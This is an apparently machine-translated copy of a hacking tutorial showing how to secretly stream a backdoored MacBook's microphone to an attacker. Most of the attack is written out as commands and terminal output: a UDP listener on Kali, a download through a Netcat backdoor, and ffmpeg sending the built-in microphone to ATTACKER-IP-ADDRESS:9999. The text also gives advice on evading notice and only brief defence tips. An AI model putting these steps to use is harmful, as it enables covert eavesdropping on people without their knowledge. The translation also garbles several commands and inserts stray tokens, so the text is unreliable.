قالب وردپرس درنا توس
Home / Tips and Tricks / Remote listening in real time with every MacBook microphone «Zero Byte :: WonderHowTo

Remote listening in real time with every MacBook microphone «Zero Byte :: WonderHowTo



Google, Amazon and Facebook are always listening. But what is worse? Hackers listen too. Windows PCs are particularly vulnerable, but with a few simple commands, a remote attacker can even pick up the microphone on a Mac computer, stream audio, and listen to real-time private conversations without the victim's knowledge, abusing an overlooked security consideration. [19659002] After an attacker sets up a backdoor on a vulnerable MacBook or compromises the device remotely with a fake PDF, they can perform a variety of attacks using modern post-exploit frameworks such as Empire or Metasploit. This time, I'm showing a furtive way to hear audio with the victim's microphone using an application called FFmpeg.

Do not Miss: How to Configure a Backdoor on Any MacBook

How This Listening Attack Works

FFmpeg is a multimedia framework that covers most formats on windows, macOS and Unix-based distributions can decode, encode, transcode, convert, stream and play.

This tool installs on both the back-doctor MacBook and the attacker's Kali system. A listening server is hosted on the attacker's side, and the victim's MacBook sends audio to the attacker's system. The attacker could then tap the FFmpeg-generated stream and hear everything around the compromised MacBook.

Overheard information can include private conversations where a victim gives a password or secret to someone in the room, personal information shared during phone calls, or conversations that can later be used for blackmail. This information is very valuable to an attacker who wants to further exploit the personal and digital lives of the victim, employee, family and work colleagues.

Step 1: Installing FFmpeg in Kali

FFmpeg can be installed on the attacker's Kali Linux system with the command apt-get install ffmpeg (see below).

  apt-get install ffmpeg

Read package lists ... Done
Create dependency structure
Read status information ... Done
Recommended packages:
ffmpeg-doc
The following packages are being updated:
ffmpeg
1 updated, 0 reinstalled, 0 removed and 596 not updated.
Need 1.622 kB of archives.
After this process, 0 B of additional memory is allocated.
Received: 1 [http://archive-3.kali.org/kali ] kali-rolling / main amd64 ffmpeg amd64 7: 3.4.2-2 + b1 1,622 kB
Achieved 1,622 kB in 3s (540.9 kB / s)
Read changelogs ... Done
(Reading the database ... 312014 Files and directories are currently installed.)
Preparation for unpacking ... / ffmpeg_7% 3a3.4.2-2 + b1_amd64.deb ...
Open ffmpeg (7: 3.4.2-2 + b1) via (7: 3.4.2-1 + b1) ...
Setting up the Ffmpeg (7: 3.4.2-2 + b1) ...
Processing trigger for man-db (2.8.2-1) ... 

Step 2: Configuring the FFmpeg server

To receive an incoming audio stream, FFmpeg must be configured on the attacker's system. The following command can be used to start FFmpeg.

  ffmpeg -i udp: /0.0.0.0: 9999 /tmp/outputFile.mp3

This command tells FFmpeg to open the UDP port ( udp: / / ) Accept 9999 and input ( -i ) at any available interface ( 0.0.0.0 ). Then the audio stream is saved in MP3 format outputFile.mp3 in the directory / tmp . Of course, the port number (9999), the storage directory (/ tmp) and the file name of the output can be changed as needed. For this demonstration I use easy to remember values.

That's it for setting up FFmpeg on the attacker's system. Next, I'll show how to configure FFmpeg on the backdoored MacBook.

Step 3: Install FFmpeg on the Backdoored MacBook

FFmpeg can record audio via Apple's AVFoundation, a full-featured framework for working with media on iOS, MacOS and watchOS. With AVFoundation, users can play, create and edit media files and integrate powerful media features into applications.

Use cURL to download FFmpeg from the Netcat backdoor on the MacBook, and save the ZIP in the / tmp directory. This can be done with the following command. To prevent the victim user from suspecting, the destination MacBook may use a directory other than / tmp.

  curl # https: //ffmpeg.zeranoe.com/builds/macos64/static/ffmpeg-4.0-macos64-static.zip # 39659014] if the Download is complete, use the command  unzip /tmp/ffmpeg.zipto extract the files as shown below. 

  unpack /tmp/ffmpeg.zip

Archive: ffmpeg.zip
Creation: ffmpeg-4.0-macos64-static /
Build: ffmpeg-4.0-macos64-static / bin /
Inflation: ffmpeg-4.0-macos64-static / bin / ffmpeg
Inflation: ffmpeg-4.0-macos64-static / bin / ffplay
Inflation: ffmpeg-4.0-macos64-static / bin / ffprobe
Creation: ffmpeg-4.0-macos64-static / doc /
Inflation: ffmpeg-4.0-macos64-static / doc / bootstrap.min.css
Inflation: ffmpeg-4.0-macos64-static / doc / default.css
Inflation: ffmpeg-4.0-macos64-static / doc / developer.html
Inflation: ffmpeg-4.0-macos64-static / doc / faq.html
Inflate: ffmpeg-4.0-macos64-static / doc / fate.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-all.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-bitstream-filters.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-codecs.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-devices.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-filters.html
Inflate: ffmpeg-4.0-macos64-static / doc / ffmpeg-formats.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-protocols.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-resampler.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffmpeg-scaler.html
Inflate: ffmpeg-4.0-macos64-static / doc / ffmpeg-utils.html
Inflate: ffmpeg-4.0-macos64-static / doc / ffmpeg.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffplay-all.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffplay.html
Inflation: ffmpeg-4.0-macos64-static / doc / ffprobe-all.html
Inflate: ffmpeg-4.0-macos64-static / doc / ffprobe.html
Inflation: ffmpeg-4.0-macos64-static / doc / general.html
Inflation: ffmpeg-4.0-macos64-static / doc / git-howto.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavcodec.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavdevice.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavfilter.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavformat.html
Inflate: ffmpeg-4.0-macos64-static / doc / libavutil.html
Inflate: ffmpeg-4.0-macos64-static / doc / libswresample.html
Inflate: ffmpeg-4.0-macos64-static / doc / libswscale.html
Inflate: ffmpeg-4.0-macos64-static / doc / mailing-list-faq.html
Inflate: ffmpeg-4.0-macos64-static / doc / nut.html
Inflation: ffmpeg-4.0-macos64-static / doc / platform.html
Inflation: ffmpeg-4.0-macos64-static / doc / style.min.css
Inflation: ffmpeg-4.0-macos64-static / LICENSE.txt
Create: ffmpeg-4.0-macos64-static / Preferences /
Inflate: ffmpeg-4.0-macos64-static / Preferences / ffprobe.xsd
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-1080p.ffpreset
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-1080p50_60.ffpreset
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-360p.ffpreset
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-720p.ffpreset
Inflation: ffmpeg-4.0-macos64-static / Preferences / libvpx-720p50_60.ffpreset
Inflation: ffmpeg-4.0-macos64-static / README.txt 

A new directory named "ffmpeg-4.0-macos64-static /" is created. This directory contains a bin / directory containing the file ffmpeg . Change to bin / with the command cd .

  cd ffmpeg-4.0-macos64-static / bin / 

Make sure that the ffmpeg file is above the [19979006] chmod command.

  chmod 777 ffmpeg 

Then list the available input devices on the MacBook with the command ./ ffmpeg -f avfoundation -list_devices true -i " as seen

  ./ ffmpeg -f avfoundation -list_devices true -i ""

AVFoundation Input Device @ 0x7fda1bc152c0 AVFoundation Video Devices:
AVFoundation input device @ 0x7fda1bc152c0 0 FaceTime HD camera (built-in)
AVFoundation input device @ 0x7fda1bc152c0 1 Capture screen 0
AVFoundation input device @ 0x7fda1bc152c0 AVFoundation audio devices:
AVFoundation input device @ 0x7fda1bc152c0 0 USB Audio CODEC
AVFoundation Input Device @ 0x7fda1bc152c0 1 Built-in Microphone 

This command enforces ( -f ) FFmpeg the AVFoundation format and list ( -list_devices ) all available inputs () i ") Devices in the MacBook AVFoundation uses the" Video: Audio "convention, so the recording of audio with the built-in microphone in the next command is displayed as ": 1 " because the microphone is connected to the Audio device "1" is assigned. [19659002] To record audio using the built-in microphone, run the following command from a Netcat shell on the Backdoctor MacBook:

  ./ ffmpeg -f avfoundation -i ": 1" -f mp3 udp: // ATTACKER-IP-ADDRESS: 9999 

Remember, the input source on other MacBook devices may be displayed as "0" or "2." The Force Format ( - f ) returns to specifying the output format ( MP3 ) and sends the audio stream to the attacker's UDP address on port 9999.

From the Netcat backdoor, the following output will continue to generate data related to the data stream.

  ffmpeg Version 4.0 Copyright (c) 2000-2018 the FFmpeg developer
Created with Apple LLVM Version 9.1.0 (clang-902.0.39.1)

Configuration: --enable-gpl --enable-version3 --able-sdl2 --enable-bzlib --enable-fontconfig --enable-gnuts --enable-iconv --enable-libass --enable-libbluray --enable -libfreetype --enable-libmp3lame --enable-libopencore-amrnb --enable-libopencore-amrwb --openable-libopenjpeg --enable-libopus --enable-libshine --enable-libsnappy --enable-libs0x --enable- libthea --enable-libtwalame --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx264 --enable-libx265 --fenable-libxml2 --enable-libzimg --enable-lzma --enable- zlib --enable-gmp --able-libvidstab --enable-libvorbis --enable-libvo-amrwbenc --enable-libmysofa --enable-libspeex --openable-libxvid --enable-liboom --enable-appkit - enable -avfoundation --enable-coreimage --enable-audiotooolbox

Libavutil 56. 14.100 / 56. 14.100
libavcodec 58. 18.100 / 58. 18.100
libavformat 58. 12.100 / 58. 12.100
libavdevice 58. 3.100 / 58. 3.100
libavfilter 7. 16.100 / 7. 16.100
libswscale 5. 1.100 / 5. 1.100
libswresample 3. 1.100 / 3. 1.100
libpostproc 55. 1.100 / 55. 1.100
Input # 0, avfoundation, from & # 39 ;: 1 & # 39 ;:
Duration: N / A, Start: 68239.447483, Bitrate: 2822 kb / s
Stream # 0: 0: Audio: pcm_f32le, 44100 Hz, stereo, flt, 2822 kb / s
Stream Mapping:
Stream # 0: 0 -> # 0: 0 (pcm_f32le (native) -> mp3 (libmp3lame))
Press q to stop ,? for help
Issue # 0, mp3, to & quot; udp: // ATTACKER IP ADDRESS: 9999 & # 39 ;:
metadata:
TSSE: Lavf58.12.100
Stream # 0: 0: Audio: mp3 (libmp3lame), 44100 Hz, Stereo, fltp
metadata:
Encoder: lavc58.18.100 libmp3lame
ze = 2354kB Time = 00: 02: 30.62 Bitrate = 128.0kbits / s Speed ​​= 0.999x 

Back on the attacker's server, the FFmpeg terminal displays audio data and begins saving the audio in the specified (/ tmp) - Directory.

  ffmpeg Version 3.4.2-2 + b1 Copyright (c) 2000-2018 the FFmpeg developer
built with gcc 7 (Debian 7.3.0-16)
libavutil 55. 78.100 / 55. 78.100
libavcodec 57.107.100 / 57.107.100
libavformat 57. 83.100 / 57. 83.100
libavdevice 57. 10.100 / 57. 10.100
libavfilter 6.107.100 / 6.107.100
libavresample 3. 7. 0 / 3. 7. 0
libswscale 4. 8.100 / 4. 8.100
libswresample 2. 9.100 / 2. 9.100
libpostproc 54. 7.100 / 54. 7.100
Input # 0, mp3, from & # 39; udp: / 0.0.0.0: 9999 & # 39;:
metadata:
Encoder: Lavf58.12.100
Duration: N / A, Start: 0.000000, Bitrate: 128 kb / s
Stream # 0: 0: Audio: mp3, 44100 Hz, stereo, s16p, 128 kb / s
Stream Mapping:
Stream # 0: 0 -> # 0: 0 (mp3 (native) -> mp3 (libmp3lame))
Press q to stop ,? for help
Issue # 0, mp3, after & # 39; /tmp/outputFile.mp3&#39 ;:
metadata:
TSSE: Lavf57.83.100
Stream # 0: 0: Audio: mp3 (libmp3lame), 44100 Hz, stereo, s16p
metadata:
Encoder: Lavc57.107.100 libmp3lame
mp3 @ 0x55ddc6449240 skipped -8 enddists: -4 -4
mp3 @ 0x55ddc6449240 skipped over -9 enddists: -7 -7
mp3 @ 0x55ddc6449240 skipped -7 enddists: -6 -6
mp3 @ 0x55ddc6449240 skipped -8 enddists: -5 -5
skip mp3 @ 0x55ddc6449240, skip -7 enddists: -1 -1
mp3 @ 0x55ddc6449240 skipped, skip -5 enddists: -2 -2

...

mp3 @ 0x55ddc6449240 skipped -7 enddists: -3 -3peed = 0.997x
mp3 @ 0x55ddc6449240 skipped -7 enddists: -6 -6
mp3 @ 0x55ddc6449240 skipped -7 enddists: -2 -2peed = 0.996x
mp3 @ 0x55ddc6449240 skipped -6 enddists: -5 -5 = 0.997x
mp3 @ 0x55ddc6449240 skipped -6 enddists: -5 -5 = 0.994x
mp3 @ 0x55ddc6449240 skipped, skip -7 enddists: -2 -2
skip mp3 @ 0x55ddc6449240, skip -7 enddists: -3 -3
Size = 2466kB Time = 00: 02: 37.78 Bitrate = 128.0kbps Speed ​​= 0.994x
Video: 0kB Audio: 2466kB Subtitles: 0kB Other Streams: 0kB Global Header: 0kB Muxing overhead: 0.010020% 

As long as the FFmpeg terminals are running on both machines, the MacBook microphone continues to send audio signals to the attacker server

Step 4: Install MPV and Listen to Streaming Audio

The last step is to listen to the audio stream. This can be done with MPV, a terminal-based application that can play audio from the command line. Use the command apt-get install mpv to install MPV in Kali.

  apt-get install mpv

Read package lists ... Done
Create dependency structure
Read status information ... Done
The following NEW packages will be installed:
mPV
0 updated, 1 reinstalled, 0 removed and 596 not updated.
Need 0 B / 933 kB of archives.
After this operation, 2,293 KB of additional memory will be used.
Selecting the previously unselected package mpv.
(Reading the database ... 311978 Files and directories are currently installed.)
Preparation for unpacking ... / mpv_0.27.2-1_amd64.deb ...
Unpack mpv (0.27.2-1) ...
Setting up mpv (0.27.2-1) ... 

Finally, use the command mpv --keep-open = yes /tmp/outputFile.mp3to start listening to the audio:

  mpv --keep-open = yes /tmp/outputFile.mp3
Playback: outputFile.mp3
(+) Audio --aid = 1 (mp3)
AO: Pulse 44100Hz Stereo 2ch s16
A: 00:01:54 / 00:02:37 (72%) 

The argument - keep-open is not required. When the end of the file is reached, the MPV command is not closed.

As mentioned above, FFmpeg continues to write audio to the file "outputFile.mp3". Since MPV plays audio in real time, it occasionally reaches the end of the file before FFmpeg can process the streaming of the audio. This is much like YouTube videos need to be buffered before they can be played. MPV can not play audio if FFmpeg is not processed. I would recommend leaving a 5-10 second buffer in the MPV terminal for a seamless ( near-real-time ) streaming experience.

How to Protect Against Audio Streaming Attacks

There is a good chance that anti-virus software will not fend off such attacks, as FFmpeg is not considered a malicious application and does not attempt to modify files on the computer or open ports ,

Unlike frequently looking for suspicious processes with or ps there is not much that can be done. In a future manual, I'll show how to hide such processes from active user recognition, so these methods are not a surefire way to detect abuse.

One last way to protect yourself from eavesdropping is to disconnect the MacBook, iMac, or other Mac computer's built-in microphone cable using only third-party microphones or integrated microphone headsets Just unplug it. This will at least protect you from potential eavesdropping.

Stay tuned for more macOS hacks

That's it for streaming audio from a Backdoored MacBook with FFmpeg and MPV. In the next few articles, I'll show how to drop keychain passwords, capture keystrokes, hack iCloud passwords, and use many Empire and Metasploit post-exploit modules to hack MacOS devices.

Cover Picture of Negative Space / PEXELS; Screenshots of tokyoneon / zero byte

Source link